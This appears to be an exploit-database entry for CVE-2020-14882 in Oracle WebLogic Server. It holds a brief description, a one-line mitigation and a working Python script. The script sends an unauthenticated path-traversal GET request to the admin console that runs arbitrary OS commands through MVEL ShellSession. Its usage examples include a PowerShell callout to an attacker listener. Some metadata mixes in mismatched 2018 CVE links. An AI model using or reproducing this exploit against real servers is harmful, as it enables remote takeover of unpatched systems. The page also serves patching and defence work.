Oracle WebLogic Server 10.3.6.0.0 / 12.1.3.0.0 / 12.2.1.3.0 / 12.2.1.4.0 / 14.1.1.0.0 - Unauthenticated RCE via GET request

vendor:

WebLogic Server

by:

Nguyen Jang

9.8

CVSS

HIGH

Unauthenticated RCE

CWE

Product Name: WebLogic Server

Affected Version From: 10.3.6.0.0

Affected Version To: 14.1.1.0.0

Patch Exists: YES

Related CWE: CVE-2020-14882

CPE: a:oracle:weblogic_server

Metasploit: https://www.rapid7.com/db/vulnerabilities/oracle-weblogic-cve-2020-14882/, https://www.rapid7.com/db/vulnerabilities/alma_linux-cve-2018-14882/, https://www.rapid7.com/db/vulnerabilities/centos_linux-cve-2018-14882/, https://www.rapid7.com/db/vulnerabilities/redhat_linux-cve-2018-14882/, https://www.rapid7.com/db/vulnerabilities/oracle_linux-cve-2018-14882/

Other Scripts: N/A

Platforms Tested: Windows, Linux, Mac

2020

Oracle WebLogic Server 10.3.6.0.0 / 12.1.3.0.0 / 12.2.1.3.0 / 12.2.1.4.0 / 14.1.1.0.0 – Unauthenticated RCE via GET request

This exploit allows an attacker to execute arbitrary commands on a vulnerable Oracle WebLogic Server instance via a GET request. The exploit works by sending a specially crafted request to the server, which contains a malicious payload that is executed by the server. The payload is a Java expression that is evaluated by the server and executed as a command.

Mitigation:

Oracle has released a patch for this vulnerability. It is recommended to apply the patch as soon as possible.

Source

Exploit-DB raw data:

#!/usr/bin/python3

# Exploit Title: Oracle WebLogic Server 10.3.6.0.0 / 12.1.3.0.0 / 12.2.1.3.0 / 12.2.1.4.0 / 14.1.1.0.0  - Unauthenticated RCE via GET request
# Exploit Author: Nguyen Jang
# CVE: CVE-2020-14882
# Vendor Homepage: https://www.oracle.com/middleware/technologies/weblogic.html
# Software Link: https://www.oracle.com/technetwork/middleware/downloads/index.html

# More Info: https://testbnull.medium.com/weblogic-rce-by-only-one-get-request-cve-2020-14882-analysis-6e4b09981dbf

import requests
import sys

from urllib3.exceptions import InsecureRequestWarning

if len(sys.argv) != 3:
    print("[+] WebLogic Unauthenticated RCE via GET request")
    print("[+] Usage : python3 exploit.py http(s)://target:7001 command")
    print("[+] Example1 : python3 exploit.py http(s)://target:7001 \"nslookup your_Domain\"")
    print("[+] Example2 : python3 exploit.py http(s)://target:7001 \"powershell.exe -c Invoke-WebRequest -Uri http://your_listener\"")
    exit()

target = sys.argv[1]
command = sys.argv[2]

request = requests.session()
headers = {'Content-type': 'application/x-www-form-urlencoded; charset=utf-8'}

print("[+] Sending GET Request ....")

GET_Request = request.get(target + "/console/images/%252E%252E%252Fconsole.portal?_nfpb=false&_pageLable=&handle=com.tangosol.coherence.mvel2.sh.ShellSession(\"java.lang.Runtime.getRuntime().exec('" + command + "');\");", verify=False, headers=headers)

print("[+] Done !!")